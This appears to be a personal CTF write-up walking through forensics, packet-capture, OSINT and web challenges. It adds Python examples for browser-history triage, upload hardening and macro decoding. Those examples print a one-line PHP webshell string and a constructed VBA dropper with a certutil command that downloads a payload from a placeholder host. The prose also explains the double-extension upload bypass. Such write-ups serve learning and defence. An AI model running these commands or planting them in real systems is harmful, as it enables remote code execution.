I had the privilege of participating in an individual Capture The Flag (CTF) event hosted by Cybertalents, wherein I achieved first place by successfully solving all of the challenges presented. This article serves as a comprehensive write-up, recounting the experience and providing insights into the various intriguing challenges encountered. Have fun.
Note: the write-up starts with the hard challenges and works down to the easy ones.
Let’s just get started.
Challenge Name: History 102
Difficulty: Hard
Category: Digital Forensics
In this challenge, we got a disk image of a Windows system. I used FTK Imager to look around for anything that seemed off, checking the usual forensic hot spots first: Downloads, Documents, Desktop, and the temp directories.
The only thing I found was this, which is a bit sus.
So I took the hash of the executable and checked it on VirusTotal, which flags it as malicious.
Now we have the first part of the flag Flag{316fcaf0160b0025e13187624d0ac081_?_?}
The challenge name is History, so it makes sense to check the browser history. The challenge also says the ads got him.
Check the history at this path: AppData/Local/Microsoft/Edge/User Data/Default/History. Open it with any SQLite viewer.
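Instead of a GUI viewer, the same file can be queried with a few lines of Python. The example below is added here and is not part of the original write-up or the challenge material: it builds a constructed, minimal stand-in for the Edge History database (only the `urls` columns the query touches, with made-up rows in the 203.0.113.0/24 documentation range), opens it read-only, converts the WebKit-epoch timestamps Chromium-family browsers use (microseconds since 1601-01-01 UTC), and flags URLs that end in a droppable file type. The same `recent_urls` query works unchanged on a real History file copied out of the image.

```python
import sqlite3
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

# Chromium-family browsers (Edge, Chrome) store timestamps as microseconds
# since 1601-01-01 UTC (the WebKit epoch), not the Unix epoch.
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def webkit_to_datetime(us):
    return WEBKIT_EPOCH + timedelta(microseconds=us)


def build_sample_history(path):
    """Constructed stand-in for a real History file: only the 'urls' columns we query."""
    con = sqlite3.connect(path)
    con.execute(
        "CREATE TABLE urls (id INTEGER PRIMARY KEY, url TEXT, title TEXT, "
        "visit_count INTEGER, last_visit_time INTEGER)"
    )
    rows = [  # constructed sample rows; 203.0.113.0/24 is a documentation range
        (1, "https://www.bing.com/search?q=free+games", "free games - Bing", 3, 13340000000000000),
        (2, "http://203.0.113.7/ads/click?id=42", "Special offer", 1, 13340000060000000),
        (3, "http://203.0.113.7/files/setup.exe", "", 1, 13340000075000000),
    ]
    con.executemany("INSERT INTO urls VALUES (?, ?, ?, ?, ?)", rows)
    con.commit()
    con.close()


def recent_urls(path, limit=50):
    """Most recent URLs, opened read-only so the evidence file is never modified."""
    uri = Path(path).resolve().as_uri() + "?mode=ro"
    con = sqlite3.connect(uri, uri=True)
    cur = con.execute(
        "SELECT url, title, visit_count, last_visit_time FROM urls "
        "ORDER BY last_visit_time DESC LIMIT ?",
        (limit,),
    )
    rows = [(webkit_to_datetime(t), url, title, n) for url, title, n, t in cur]
    con.close()
    return rows


EXEC_SUFFIXES = (".exe", ".msi", ".scr", ".bat", ".zip", ".iso")


def download_candidates(rows):
    """Keep entries whose path (query string ignored) ends in a droppable file type."""
    return [r for r in rows if r[1].split("?", 1)[0].lower().endswith(EXEC_SUFFIXES)]


def analyze_sample():
    """Build the constructed database in a temp dir and run the two queries on it."""
    with tempfile.TemporaryDirectory() as d:
        p = Path(d) / "History"
        build_sample_history(p)
        rows = recent_urls(p)
    return rows, download_candidates(rows)


if __name__ == "__main__":
    rows, hits = analyze_sample()
    for when, url, title, n in rows:
        print(when.strftime("%Y-%m-%d %H:%M:%S UTC"), n, url, title)
    print("download candidates:", [r[1] for r in hits])
```

Point `recent_urls` at a copy of the real History file (take the journal file next to it as well if present) rather than the original in the mounted image; the `mode=ro` URI keeps SQLite from writing to it even then.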
Now you got the second part Flag{316fcaf0160b0025e13187624d0ac081_156.26.173.114_?}
The last part of the flag requires a bit of reversing, but first let me explain the mindset. We need the wallet address, which is probably a Bitcoin address or similar. Attackers normally leave that in a ransom note on the Desktop, but in our case there are no files there. After checking the strings in the malicious executable and doing some basic static analysis, I had no luck.
That’s when I decided to fire up IDA, the disassembler reverse engineers use for extracting IOCs and doing their nerdy reversing work.
Once it was loaded, I noticed the string 'secr3t', which is the name of a value the malware stores under this registry key: SOFTWARE\Microsoft\Windows NT\CurrentVersion.
I exported the SOFTWARE hive, checked that secr3t value, and we got something.
Hella weird, right? I grabbed this nonsense and asked CyberChef to make something sensible out of it.
CyberChef never disappoints me.
Now we got the three parts of the flag Flag{316fcaf0160b0025e13187624d0ac081_156.26.173.114_bc1qxy2kgdygjrsqtzq2n0yrf2493!83kkfjhx0wlh}
Challenge Name: T3ST4R
Difficulty: Medium
Category: Network Forensics
We got a PCAP file, and the description says that our website got hacked, and the attackers hid something.
Filtering for HTTP requests
You are going to notice a bunch of POST requests to panel.php from 192.168.235.137.
Checking these streams, you will find a flag.jpg that he is uploading. Easy.
Export the file and open it.
Well, we got played and fell into a rabbit hole.
Continuing the analysis, I found ‘elephant.php.png’. Why the double extension? It is a technique attackers use to get past the upload filter (or WAF) when it only allows PNG files: the name ends in .png, so a check that looks only at the last extension lets it through, while a server configured to hand anything with .php in the name to the PHP interpreter (for example an Apache AddHandler rule for .php) still executes it. So the attacker tricked the filter and uploaded a PHP file.
Checking the content of the PHP file:
So the attacker’s file simply fetches this URL and passes the result to shell_exec(), so it is probably a reverse shell. It was kind of obvious to me because of my pentest background: as soon as I saw PentestMonkey, all the reverse shell alarms went off.
Checking the URL, it downloads a favicon file; running strings on it shows that it does indeed contain a reverse shell.
This string looks encoded. Grab it and head to CyberChef.
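To make the double-extension bypass concrete, here is an added example (mine, not code from the challenge or from the hacked site) that puts the weak check next to a hardened one. `weak_is_allowed` is the kind of filter 'elephant.php.png' walks through, because it only looks at the final suffix. `check_upload` requires a bare basename with exactly one allowlisted extension and checks that the bytes actually start with that image type's magic bytes, and `storage_name` replaces the client's filename with a random server-chosen one so a handler rule keyed on `.php` never sees it. The function names and the allowlist are my assumptions for illustration.

```python
import secrets
from pathlib import PurePosixPath

# Allowlisted extensions with the magic bytes a file of that type must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def weak_is_allowed(filename):
    """The filter 'elephant.php.png' gets past: only the final suffix is examined."""
    return filename.lower().rsplit(".", 1)[-1] in ALLOWED


def check_upload(filename, content):
    """Hardened check. Returns (ok, reason_or_ext).

    - strip directory components (both slash styles) so only the basename counts
    - exactly one extension, and it must be on the allowlist
    - the content must begin with the magic bytes of the declared type
    """
    name = PurePosixPath(filename.replace("\\", "/")).name
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "filename must have exactly one extension"
    ext = parts[1].lower()
    if ext not in ALLOWED:
        return False, f"extension .{ext} is not allowed"
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match the declared image type"
    return True, ext


def storage_name(ext):
    """Never keep the client's name on disk: a random, server-chosen name defeats
    handler tricks like '.php.png' and stops attackers guessing the upload path."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    webshell = b"<?php echo shell_exec($_GET['c']); ?>"
    print("weak filter accepts elephant.php.png:", weak_is_allowed("elephant.php.png"))
    print("hardened check:", check_upload("elephant.php.png", webshell))
    print("real png:", check_upload("logo.png", b"\x89PNG\r\n\x1a\n\x00\x00"))
    print("stored as:", storage_name("png"))
```

The magic-byte check alone is not a complete defence: a valid PNG with PHP appended (a polyglot) still starts with the PNG header. Renaming on the server and keeping the upload directory out of the interpreter's reach is what actually stops the uploaded file from running, so treat the extension and content checks as the first layer rather than the only one.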
You will get most of the flag, and you can guess the rest easily.
Flag{0H_1M_H3R3_MY_FR13N6_Y0U_G0T_MY_B4CKD00R}
Challenge Name: Job
Difficulty: easy
Category: Digital Forensics
In this one we got an .eml file, which is the extension for a saved email. Opening it with any mail client or a text editor, you will notice an attachment that was sent with the email.
So, download the docx file and check whether there are any macros inside it with oletools: olevba -c <document.docx>
We notice a VBA macro inside the document, but its payload is base64 encoded. Decode it.
You get your flag, which is Flag{162.219.145.2:184}
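Decoding one literal by hand is fine for a CTF; for a real phishing triage you want the extraction scripted. The example below is added here and is not from the write-up or the challenge document: it constructs a small macro in the style of a dropper (the base64 string is split into chunks joined with `&` and line continuations, a common trick to defeat naive string grep), re-joins the concatenations, decodes every long base64 literal that validates, and pulls ip:port indicators out of the results. The sample macro and the 192.0.2.10 address are constructed for illustration; olevba's own `--decode` option does a similar pass.

```python
import base64
import binascii
import re

# Constructed sample, built at import time so the encoded value is self-consistent:
# a macro that reassembles a base64 string from chunks, as droppers often do.
_PAYLOAD_B64 = base64.b64encode(b"http://192.0.2.10:4444/payload.exe").decode()
_CHUNKS = [_PAYLOAD_B64[i:i + 8] for i in range(0, len(_PAYLOAD_B64), 8)]
SAMPLE_VBA = (
    "Sub AutoOpen()\n"
    "    Dim u As String\n"
    '    u = "' + '" & _\n        "'.join(_CHUNKS) + '"\n'
    "    Dim s As Object\n"
    '    Set s = CreateObject("WScript.Shell")\n'
    '    s.Run "cmd /c certutil -urlcache -split -f " & Decode(u), 0\n'
    "End Sub\n"
)

# "abc" & _ <newline> "def"  ->  "abcdef"   (also handles plain "abc" & "def")
CONCAT = re.compile(r'"\s*&\s*_?\s*"')
# a quoted literal made only of base64 characters, long enough to be worth decoding
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')
IP_PORT = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?\b")


def join_concatenations(vba):
    """Collapse string concatenations so split literals become one literal."""
    return CONCAT.sub("", vba)


def decode_b64_literals(vba):
    """Return (literal, decoded_bytes) for every long base64 literal that decodes cleanly."""
    out = []
    for m in B64_LITERAL.finditer(join_concatenations(vba)):
        try:
            out.append((m.group(1), base64.b64decode(m.group(1), validate=True)))
        except binascii.Error:
            continue  # looked like base64 but was not (bad padding / length)
    return out


def extract_c2(vba):
    """Collect ip[:port] indicators from the decoded literals."""
    iocs = []
    for _, raw in decode_b64_literals(vba):
        text = raw.decode("latin-1")  # never raises; good enough for IOC grep
        for ip, port in IP_PORT.findall(text):
            iocs.append(f"{ip}:{port}" if port else ip)
    return iocs


if __name__ == "__main__":
    print(SAMPLE_VBA)
    for literal, raw in decode_b64_literals(SAMPLE_VBA):
        print(literal, "->", raw)
    print("IOCs:", extract_c2(SAMPLE_VBA))
```

To run this on a real document, feed it the text that `olevba -c` prints instead of `SAMPLE_VBA`; the concatenation and literal regexes are deliberately loose so they also catch literals split across many continuation lines.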
Challenge Name: Qakbot Case
Difficulty: Easy
Category: Digital Forensics
In this one we got an event log file. After opening it with Event Log Explorer and searching for .br,
we got only one result,
which gives us the flag right away: Flag{graficalevi.com.br}
Challenge Name: D4rkHun7
Difficulty: easy
Category: OSINT
Searching for the AlphaBay administrator, it turns out his name is Alexandre Cazes.
The CTF asks for his mobile signing keys. Searching for "Alexandre Cazes signing keys", you will notice this dude.
Checking his mobile devices there, we got our flag: flag{01202cfd4f25d1b8208b3bfcfb3601c5ba32a3b842b7cbb522b69216932e6502da170a}
Challenge Name: easywin
Difficulty: easy
Category: Web Security
After opening the link, we get a site that says you don’t need an account.
Looking at the page source, we see this obfuscated JS code.
Looking closely at that code:
We have something called 5up3res3cre3t.html; accessing this endpoint gives us the flag.
NOW, I have included everything except two challenges, Serv3r and Admin, because they are actually taken from the famous Boss of the SOC v1 CTF, so you can just check any write-up for that, which will contain even more juicy information.
That’s it for now.
Cya geeks.